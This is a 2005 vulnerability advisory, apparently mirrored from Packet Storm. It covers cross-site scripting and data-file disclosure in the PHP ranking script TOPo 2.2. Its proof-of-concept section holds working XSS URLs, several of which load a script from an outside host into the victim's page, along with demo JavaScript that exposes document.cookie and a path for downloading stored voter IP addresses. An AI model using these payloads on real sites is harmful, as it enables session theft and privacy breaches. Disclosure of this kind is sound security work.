TOPo22.txt

🗓️ 14 Aug 2005 00:00:00Reported by LostmonType
packetstorm🔗 packetstormsecurity.com👁 26 Views
TOPo 2.2 has XSS vulnerability and information disclosure due to unvalidated parameters in PHP script.
`#######################################################  
TOPo 2.2 multiple variable & fields XSS and information disclosure  
vendor url:http://ej3soft.ej3.net/index.php?m=info&s=topo&t=info  
advisore: http://lostmon.blogspot.com/2005/05/topo-22-multiple-variable-fields-xss.html  
vendor notified: yes exploit available: yes.  
#######################################################  
  
TOPo is a free TOP system written in PHP that works  
without MySQL database.TOPo is specially designed for  
web sites hosted in web servers that not offer a  
quality MySQL support.  
  
TOPo contains a flaw that allows a remote cross site  
scripting attack.This flaw exists because the application  
does not validate 'm','s','ID','t' and possible other parameters  
upon submission to the 'index.php'script.This could allow a user  
to create a specially crafted URL that would execute arbitrary  
code in a user's browser within the trust relationship between  
the browser and the server,leading to a loss of integrity.  
  
TOPo contains a flaw too that allow remote users to information disclosure.  
all data are stored in '/data/' folder and all *.dat files store all votes ,  
comments and other information about the site on top. Any user can download  
this files and obtain all client ip address(all clients who are vote  
or added a comment)  
  
################  
software use:  
###############  
  
Microsoft Windows 2000 [Version 5.00.2195] all fixes.  
Internet explorer 6.0 sp1 all fixes.  
Netcraft toolbar 1.5.6 ( detects all attacks XSS in this case :D)  
Google toolbar 2.0.114.9-big/es  
  
###########  
versions:  
###########  
  
TOPo v2.2.178 vulnerable.  
  
##############  
solution  
##############  
  
no solution was available at this time.  
  
############  
time line  
############  
  
discovered: 13 may 2005  
vendor notify: 19 may 2005  
vendor response:  
vendor fix:  
disclosure: 20 may 2005  
  
######################  
Proof of concepts XSS  
######################  
  
http://[victim]/topo/index.php?m=top">  
<SCRIPT%20src=http://www.drorshalev.com/dev/injection/js.js>  
</script>&s=info&ID=1114815037.2498   
  
http://[victim]/topo/index.php?m=top&s=info&ID=1115946293.3552  
"><SCRIPT%20src=http://www.drorshalev.com/dev/injection/js.js>  
</SCRIPT>&t=puntuar  
  
http://[victim]/topo/index.php?m=top&s=info">  
<script>alert()</script>&ID=1115946293.3552&t=puntuar  
  
http://[victim]/topo/index.php?m=top">  
<script>alert()</script>&s=info&ID=1115946293.3552&t=puntuar  
  
http://[victim]/topo/index.php?m=top&s=info&t=comments&ID=  
1114815037.2498"><SCRIPT%20src=http://www.drorshalev.com/dev/  
injection/js.js></script>  
  
http://[victim]/topo/index.php?m=top&s=info&t=comments&paso=1  
&ID=1111068112.7598"><SCRIPT%20src=http://www.drorshalev.com/dev  
/injection/js.js></script>  
  
http://[victim]/topo/index.php?m=members&s=html&t=edit"><SCRIPT  
%20src=http://www.drorshalev.com/dev/injection/js.js></script>   
  
#########################  
  
  
Wen try to added a new comment some fields are vulnerable to XSS style attacks.  
  
http://[victim]/top/index.php?m=top&s=info&t=comments&paso=1&ID=1115946293.3552  
  
field name vulnerable, Your web field vulnerable and your email field  
are vulnerable.  
  
  
##################  
example of js.js  
##################  
  
Thnx to http://www.drorshalev.com for this script and for hosting it  
for this demonstration.  
  
#################  
js.js  
#################  
  
function showIt(){  
document.body.innerHTML="<a  
href='javascript:alert(document.cookie)'><center><b>Your PC Can be  
hacked Via "+ document.domain +" XSS ,Html Injection to a Web Site  
"+document.domain +" By DrorShalev.com<br></b><br><img border=0  
src='http://sec.drorshalev.com/dev/injection/lig.gif' width=60  
HEIGHT=60><img src='http://www.drorshalev.com/dev/injection/gif.jpg.asp'  
border=1><br></center></a>"+ document.body.innerHTML  
window.status="Your PC Can be hacked Via "+ document.domain +" XSS  
,Html Injection to a Web Site "+document.domain +" By DrorShalev.com"  
setTimeout("window.open('view-source:http://sec.drorshalev.com/dev/injection/xss.txt')",6000);  
  
}  
  
setTimeout("showIt()",2000);  
  
################  
data disclosure  
################  
  
http://[victim]/data/  
  
################ EnD #####################  
  
thnx to estrella to be my ligth  
thnx to all http://www.osvdb.org Team  
Thnx to http://www.drorshalev.com and dror for his script and for  
hosting it !!!!  
thnx to all who day after day support me !!!  
  
--  
atentamente:  
Lostmon ([email protected])  
Web-Blog: http://lostmon.blogspot.com/  
Data Mangler of: http://www.osvdb.org  
--  
La curiosidad es lo que hace mover la mente....  
`
14 Aug 2005 00:00Current
7.4High risk
Vulners AI Score7.4